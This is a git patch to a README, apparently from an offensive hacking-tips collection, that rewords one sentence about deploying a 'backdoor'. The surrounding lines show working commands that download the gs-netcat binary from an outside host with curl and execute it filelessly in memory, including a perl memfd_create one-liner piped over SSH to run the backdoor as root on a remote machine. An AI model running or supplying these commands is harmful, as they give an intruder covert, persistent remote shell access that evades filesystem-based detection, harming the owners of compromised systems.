From 72389f63e73f8094daaa429918330e20f72a553f Mon Sep 17 00:00:00 2001 From: skyper <5938498+SkyperTHC@users.noreply.github.com> Date: Tue, 3 Sep 2024 15:58:54 +0100 Subject: [PATCH] Update README.md --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index e7d34b3..4f4bba7 100644 --- a/README.md +++ b/README.md @@ -2046,7 +2046,7 @@ Deploy gsocket without writing to the filesystem (example): GS_ARGS="-ilqD -s 5sLosWHZLpE9riqt74KvG9" memexec <(curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-$(uname -m)) ``` -The backdoor can be piped via SSH directly into the remote's memory and executed: +The backdoor can also be piped via SSH directly into the remote's memory, and executed: ```sh MX="perl -e '\$f=syscall(319,\$n=\"\",1);if(-1==\$f){\$f=syscall(279,\$n,1);}open(\$o,\">&=\".\$f);while(){print \$o \$_;};exec {\"/proc/\$\$/fd/\$f\"} foo, @ARGV' --" curl -SsfL https://gsocket.io/bin/gs-netcat_mini-linux-x86_64 | ssh root@foobar "exec $MX -ilqD -s 5sLosWHZLpE9riqt74KvG9"